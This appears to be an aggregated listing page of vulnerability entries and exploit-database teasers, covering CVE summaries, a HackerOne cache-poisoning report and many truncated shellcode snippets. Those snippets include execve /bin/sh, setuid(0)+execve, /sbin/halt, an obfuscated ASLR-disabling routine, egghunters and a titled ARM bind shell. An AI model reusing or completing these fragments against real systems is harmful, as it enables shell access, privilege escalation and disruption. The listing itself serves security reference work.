perl -- multiple vulnerabilities

perldelta: CVE-2018-6797: heap-buffer-overflow WRITE of size 1 in Sregatom regcomp.c A crafted regular expression could cause a heap buffer write overflow, with control over the bytes written. perl 132227 CVE-2018-6798: Heap-buffer-overflow in Perlbytedumpstring utf8.c Matching a crafted locale...

Greenhouse.io: Cache poisoning using NULL bytes and long URLs

This is related to a previous report I made https://hackerone.com/reports/326639. The same endpoint https://boards.greenhouse.io/embed/jobboard/js?for= is still vulnerable to arbitrary string injection, by terminating the customer key in the for parameter with a URL-encoded NULL byte i.e. %00,...

CVE-2017-9693

The length of attribute value for STAEXTCAPABILITY in wlanhddchangestation in Android for MSM, Firefox OS for MSM, and QRD Android before 2017-06-06 being less than the actual lenth of StaParams.extncapability results in a read for extra bytes when a memcpy is done from params-extcapab to...

SysGauge 4.5.18 - Local Denial of Service

SysGauge 4.5.18 - Local Denial of Service !/usr/bin/python Exploit Title : SysGauge v4.5.18 - Local Denial of Service Exploit Author : Hashim Jawad Twitter : @ihack4falafel Author Website : ihack4falafel.com Vendor Homepage : http://www.sysgauge.com/ Vulnerable Software :...

Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)

/ Title: Linux/x86 - EggHunter Shellcode 11 Bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 11 Description: Smallest Null-Free Egg Hunter Shellcode - 11 Bytes Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any...

CVE-2018-7658

NTSServerSvc.exe in the server in Softros Network Time System 2.3.4 allows remote attackers to cause a denial of service daemon crash by sending exactly 11 bytes...

Linux/x86 exit(0) Shellcode (5 bytes)

/ Smallest Linux/x86 - exit0 shellcode 5 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 5 exitchotu: file format elf32-i386 Disassembly of section .text: 08048060 : 8048060: 6a 01 push 0x1 8048062: 58 pop eax 8048063: cd 80 int 0x80 ===============POC by Anurag...

Protobuf-Inspector - Tool To Reverse-Engineer Protocol Buffers With Unknown Definition

Simple program that can parse Google Protobuf encoded blobs version 2 or 3 without knowing their accompanying definition. It will print a nice, colored representation of their contents. Example: As you can see, the field names are obviously lost, together with some high-level details such as:...

AZL-7261 CVE-2004-2779 affecting package libid3tag 0.15.1b-33

id3utf16deserialize in utf16.c in libid3tag through 0.15.1b misparses ID3v2 tags encoded in UTF-16 with an odd number of bytes, triggering an endless loop allocating memory until an OOM condition is reached, leading to denial-of-service DoS...

PT-2018-4015 · Underbit Technologies +2 · Libid3Tag +2

Name of the Vulnerable Software and Affected Versions: libid3tag versions 0.15.1b and earlier Description: The issue arises from the id3 utf16 deserialize function in utf16.c, which misparses ID3v2 tags encoded in UTF-16 with an odd number of bytes. This triggers an endless loop that allocates...

Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)

Linux/ARM - Bind TCP 4444/TCP Shell /bin/sh + IP Controlled 192.168.1.190 + Null-Free Shellcode 168 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IP Controlled Bind Shell TCP /bin/sh. Null free shellcode 168 bytes Date: 2018-02-17 Tested: armv7l Raspberry Pi v3 and armv6l Raspber...

CVE-2018-1052

Removed by vendor...

Linux/x86 - Egghunter Shellcode (12 Bytes)

/ Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any other...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)

/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...

Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)

/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...

Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)

include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can...

Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)

include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...